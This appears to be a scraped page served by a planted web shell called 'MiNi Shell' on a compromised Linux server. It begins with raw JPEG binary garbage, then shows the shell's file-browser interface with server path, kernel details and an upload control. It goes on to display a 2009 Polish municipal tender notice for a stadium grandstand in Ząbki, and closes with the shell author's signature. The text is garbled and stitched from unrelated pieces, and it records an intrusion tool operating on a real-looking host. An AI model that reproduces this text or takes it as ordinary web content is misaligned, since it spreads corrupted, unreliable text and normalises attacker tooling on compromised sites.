JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090925/164191-N-2009.html

<p class="kh_header"><b>Ząbki: Przedmiotem zamówienia jest budowa trybuny głównej z zapleczem administracyjno-socjalnym stadionu mieszczącego się na terenie Miejskiego Ośrodka Sportu i Rekreacji przy ul. Słowackiego 21 w Ząbkach.</b><br>
<b>Numer ogłoszenia: 164191 - 2009; data zamieszczenia: 25.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Wojska Polskiego 10, 05-091 Ząbki, woj. mazowieckie, tel. 022 7816814, faks 022 7816813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zabki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest budowa trybuny głównej z zapleczem administracyjno-socjalnym stadionu mieszczącego się na terenie Miejskiego Ośrodka Sportu i Rekreacji przy ul. Słowackiego 21 w Ząbkach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje opracowanie wielobranżowego projektu  wykonawczego na podstawie projektu budowlanego stanowiącego Załącznik Nr 2 do SIWZ i wybudowanie zadaszonej trybuny głównej z 1996 miejscami siedzącymi, która stanowi jednocześnie zaplecze administracyjno-socjalne z uwzględnieniem obowiązujących odnośnych przepisów prawa budowlanego, przepisów licencyjnych Polskiego Związku Piłki Nożnej i zapewnia prawidłowe funkcjonowanie obiektu wraz terenem bezpośrednio związanym oraz z dojściami, drogami wewnętrznymi   i parkingiem oraz przyłączami do sieci, w tym: energetycznej, wodociągowej, kanalizacyjnej i gazowej.
Przedmiot zamówienia musi spełniać warunki i kryteria wynikające z  przepisów licencyjnych Polskiego Związku Piłki Nożnej, z których wyciąg stanowi Załącznik  Nr 3 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.32.70.00-6, 71.24.80.00-8, 71.24.00.00-0, 71.22.10.00-3, 71.20.00.00-0, 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga zabezpieczenia oferty wadium w wysokości 100.000,00 zł (słownie: sto tysięcy złotych zero groszy).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.1.	Posiadają uprawnienia do wykonywania działalności w przedmiocie zamówienia;
1.2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
1.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej terminowe wykonanie zamówienia  przy założeniu, że płatność za realizację przedmiotu zamówienia będzie dokonana na warunkach określonych w niniejszej SIWZ             tzn. w terminie do 30 dni od dnia otrzymania faktury VAT;
1.4.	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy Pzp;
2.Opis oceny spełniania warunków:
2.1.	Potencjał kadrowy: 
Wykonawca wskaże osoby, którymi dysponuje lub będzie dysponował zdolnymi  do wykonania zamówienia wraz z informacją na temat ich kwalifikacji zawodowych tj. posiadających uprawnienia do projektowania i posiadających uprawnienia budowlane do kierowania robotami budowlanymi oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem ważnym na dzień składania ofert, wydanym przez tę Izbę.
2.2.Doświadczenie: Wykonawca musi wykazać, że:
2.2.1.  w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot niniejszego zamówienia, tj. wykonał co najmniej dwa zamówienia obejmujące dokumentacje projektowe obiektów o wartości co najmniej 100 000,00 złotych brutto każdego z nich,
2.2.2. w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadające swoim rodzajem i wartością robotom budowlanych stanowiącym przedmiot niniejszego zamówienia, tj. wykonał co najmniej dwa zamówienia obejmujące budowę obiektów o wartości co najmniej 10.000 000,00 złotych brutto każdego z nich. 
2.3.Potencjał finansowo-ekonomiczny: 
2.3.1. Polisę, a w przypadku jej braku innego dokumentu potwierdzającego,  że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości ubezpieczenia, co najmniej 5.000 000,00 zł (słownie: pięć milionów złotych zero groszy).
2.3.2. Informację banku, w którym Wykonawca posiada rachunek, potwierdzającą, że Wykonawca posiada  zdolność kredytową w wysokości 3 000 000,00 zł (trzech milionów złotych).
3.Zabezpieczą swoją ofertę wadium wniesionym na warunkach określonych w dziale  IX niniejszej SIWZ;
4.Ocena spełnienia ww warunków dokonywana będzie na podstawie oświadczeń  i dokumentów wskazanych w Rozdziale  IV niniejszej SIWZ wg. formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wykaz oświadczeń i dokumentów jakie mają dostarczyć Wykonawcy:
1.1.Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych wg wzoru stanowiącego Załącznik Nr 5 do niniejszej SIWZ;
1.2.Oświadczenie wykonawcy o niepodleganiu wykluczeniu z art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych w/g wzoru stanowiącego Załącznik Nr 6 do niniejszej SIWZ;
1.3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu  do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.4.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
1.5.	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, ze Wykonawca nie zalega z opłaceniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
1.6.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.7.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.8.Wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot niniejszego zamówienia, tj. wykonał co najmniej dwa zamówienia obejmujące dokumentacje projektowe obiektów o wartości co najmniej 100 000,00 złotych brutto każdego z nich wraz z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wg wzoru stanowiącego Załącznik Nr 7 do niniejszej SIWZ, (w przypadku podania wartości w innych walutach zostanie ona przeliczona na PLN wg średniego kursu NBP na dzień ukazania się ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych);
1.9.Dokumenty potwierdzające, że usługi wymienione w wykazie wskazanym w ust. 1.8. niniejszego działu SIWZ zostały wykonane należycie.
1.10.	Wykaz podmiotów, które będą uczestniczyć w realizacji przedmiotu zamówienia w zakresie usług projektowych według wzoru stanowiącego Załącznik Nr 8 do niniejszej SIWZ 
1.11.	Wykaz osób posiadających uprawnienia do projektowania, którymi dysponuje lub będzie dysponował Wykonawca, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności według wzoru stanowiącego Załącznik Nr 9 do niniejszej SIWZ.
1.12.	Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadające swoim rodzajem i wartością robotom budowlanych stanowiącym przedmiot niniejszego zamówienia, tj. wykonał co najmniej dwa zamówienia obejmujące budowę obiektów o wartości co najmniej 10.000 000,00 złotych brutto każdego z nich wraz z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wg wzoru stanowiącego Załącznik Nr 10  do niniejszej SIWZ, (w przypadku podania wartości w innych walutach zostanie ona przeliczona na PLN wg średniego kursu NBP na dzień ukazania się ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych);
1.13.	Dokumenty potwierdzające, że roboty budowlane wymienione w wykazie wskazanym w ust. 1.12. niniejszego działu SIWZ zostały wykonane należycie.
1.14.	Wykaz podmiotów, które będą uczestniczyć w realizacji przedmiotu zamówienia  w zakresie robót budowlanych według wzoru stanowiącego Załącznik Nr 11 do niniejszej SIWZ. 
1.15.	Wykaz osób posiadających odpowiednie uprawnienia budowlane, którymi dysponuje lub będzie dysponował Wykonawca, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności według wzoru stanowiącego Załącznik  Nr 11 do niniejszej SIWZ.
W przypadku wskazania osób, którymi Wykonawca będzie dysponował,  wymagane jest złożenie pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. 
1.16.	Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia odpowiednio:
1.16.1.Projektant w specjalności architektonicznej posiadający: uprawnienia budowlane do projektowania w specjalności architektonicznej bez ograniczeń oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę.
1.16.2.Projektant w specjalności konstrukcyjno-budowlanej posiadający: uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę. 
1.16.3.Projektant w specjalności konstrukcyjno-budowlanej posiadający: uprawnienia budowlane do projektowania w specjalności drogowej bez ograniczeń oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę.
1.16.4.Projektant w specjalności konstrukcyjno-budowlanej posiadający: uprawnienia budowlane do projektowania w specjalności telekomunikacyjnej bez ograniczeń oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę.
1.16.5.Projektant w specjalności sanitarnej posiadający: uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę.
1.16.6.Projektant w specjalności elektrycznej posiadający: uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę.
1.16.7.Kierownik budowy posiadający: uprawnienia budowlane kierowania robotami bez ograniczeń oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę.
1.16.8.Kierownikiem robót w branży konstrukcyjno-budowlanej uprawnienia budowlane kierowania robotami bez ograniczeń oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę.
1.16.9.Kierownikiem robót w branży drogowej uprawnienia budowlane kierowania robotami bez ograniczeń oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę.
1.16.10.Kierownikiem robót w branży instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych uprawnienia budowlane kierowania robotami bez ograniczeń oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę.
1.16.11.Kierownikiem robót w branży instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych uprawnienia budowlane kierowania robotami bez ograniczeń oraz aktualny na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę.
1.16.12.Zamawiający uzna za równoważne odpowiednie uprawnienia budowlane,  które zostały wydane na podstawie wcześniej obowiązujących przepisów) ustawa z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 1994 r. Nr 89 poz. 414 z późn. zm.) - art. 12 ust. 2 z uwzględnieniem art. 104.
1.16.13.W przypadku dokumentów stwierdzających niejednoznacznie posiadane uprawnienia Wykonawca musi załączyć odpowiednią interpretację uprawnień wydaną przez właściwą Izbę Samorządu Zawodowego.  W przypadku dokumentów stwierdzających niejednoznacznie posiadane uprawnienia Wykonawca musi załączyć odpowiednią interpretację uprawnień wydaną przez właściwą Izbę Samorządu Zawodowego.
1.16.14.W przypadku wskazania osób posiadających uprawnienia budowlane wydane na terenie UE, mogą One uzyskać decyzję w sprawie wydania decyzji o uznanie kwalifikacji zawodowych oraz wpis do stosownej izby na zasadach określonych w ustawie z dnia 18.03.2008 r. (Dz. U. Nr 63 poz. 394) o zasadach uznania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.
1.17.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ust. 1.11. i 1.15 Wykonawca wskazał osoby, którymi będzie dysponował.
1.18.	Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia,  której wykonanie powierzy podwykonawcom z zastrzeżeniem, że część zamówienia obejmująca roboty budowlane w zakresie konstrukcji nie może być powierzona podwykonawcy. 
1.19.	Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości ubezpieczenia, co najmniej 5.000 000,00 zł (słownie: pięć milionów złotych zero groszy). 
1.20.	Informację banku, w którym Wykonawca posiada rachunek, potwierdzającą, że Wykonawca posiada  zdolność kredytową w wysokości 3 000 000,00 zł (trzech milionów złotych zero groszy), wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.21.	Oświadczenie o zapoznaniu się Wykonawcy z terenem, którego wzór stanowi Załącznik Nr 13 do niniejszej SIWZ.
1.22.	Potwierdzenie o zapoznaniu się z przedmiotem zamówienia, którego wzór stanowi Załącznik Nr 14 do niniejszej SIWZ.
1.23.	Harmonogram rzeczowo-czasowo-finansowy realizacji poszczególnych zakresów wchodzących w skład przedmiotu zamówienia, którego wzór stanowi Załącznik  Nr 15 do niniejszej SIWZ.
1.24.	Parafowany wzór Umowy, który stanowi Załącznik Nr 16 do niniejszej SIWZ.
1.25.	Dokument potwierdzający wniesienie wadium.
2.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa:
2.1.	w pkt 1.2., 1.3., 1.4., 1.6. niniejszego działu - składa dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2.2.w pkt. 1.5. niniejszego działu - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie art. 24 ust. 1 pkt. 4-8 ustawy.
2.3.Dokumenty, o których mowa w pkt. 2.1. lit. a) i c) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 2.1. lit. b) powinien być wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.
2.4.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa  w ust. 1.1-1.6 niniejszego działu zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
3.W celu wspólnej realizacji zamówienia objętego niniejszym postępowaniem, zamawiający dopuszcza możliwość złożenia oferty wspólnej przez podmioty działające wspólnie bez względu na ich formę organizacyjną tzw. oferty konsorcjum. 
3.1.Zamawiający w stosunku do uczestników konsorcjum wymaga ustanowienia pełnomocnika do reprezentowania konsorcjum w postępowaniu o udzielenie zamówienia (lidera), uprawnionego do podpisania oferty, umowy oraz bezpośredniego kontaktowania się i współdziałania z zamawiającym.
3.2.Do oferty muszą być załączone dokumenty, o których mowa w punkcie od 1.1 do 1.6., każdego z uczestnika wchodzącego w skład konsorcjum, pozostałe dokumenty składane są wspólnie. 
3.3.Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.
4.W przypadku złożenia oferty przez spółkę cywilną należy wskazać osoby uprawnione do składania oświadczeń woli w imieniu spółki. W przypadku, gdy ofertę składa spółka z ograniczoną odpowiedzialnością, a wartość oferty dwukrotnie przewyższa wartość kapitału zakładowego, wymagane jest załączenie stosownego dokumentu (uchwała wspólników lub umowa spółki) w trybie art. 230 Ustawy z dnia 15 września 2000 r. - Kodeks spółek handlowych (Dz. U. Nr 94, poz. 1037 z późn. zm.).
5.Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów art.11 ust. 4 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca pragnie zastrzec przed dostępem dla innych uczestników postępowania, winny być załączone na końcu oferty w sposób umożliwiający łatwe  od niej odłączenie i być opatrzone napisem: Informacje stanowiące tajemnicę przedsiębiorstwa - nie udostępniać innym uczestnikom postępowania. 
6.Wszystkie dokumenty i oświadczenia sporządzone w jeżyku obcym należy złożyć z tłumaczeniem na język polski poświadczonym przez Wykonawcę.
7.Oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawców warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi i roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu wyznaczonym na składanie ofert.
8.W przypadku, gdy upoważnienie do reprezentowania Wykonawcy nie wynika bezpośrednio z  dokumentów rejestrowych Wykonawcy, do oferty należy dołączyć pełnomocnictwo. Pełnomocnictwo do reprezentowania Wykonawcy powinno jednoznacznie określać zakres umocowania i być złożone w formie oryginału lub kopi poświadczonej za zgodność z oryginałem przez notariusza.
9.W przypadku, gdy załączona do oferty kserokopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości, zamawiający może zażądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu.
10.Wymagane dokumenty powinny być złożone w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy. Za osoby uprawnione do reprezentowania Wykonawcy uznaje się osoby upoważnione do reprezentowania firmy, wskazane we właściwym rejestrze lub ewidencji działalności gospodarczej bądź w stosownym pełnomocnictwie, które należy załączyć do oferty w oryginale lub kserokopii poświadczonej za zgodność z oryginałem przez osobę udzielającą pełnomocnictwa lub poświadczone notarialnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://umzabki.bip.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ząbki
ul. Wojska Polskiego 10
05-091 Ząbki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2009 godzina 09:00, miejsce: Urząd Miasta Ząbki
Biuro Obsługi Interesanta
ul. Wojska Polskiego 10
05-091 Ząbki.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com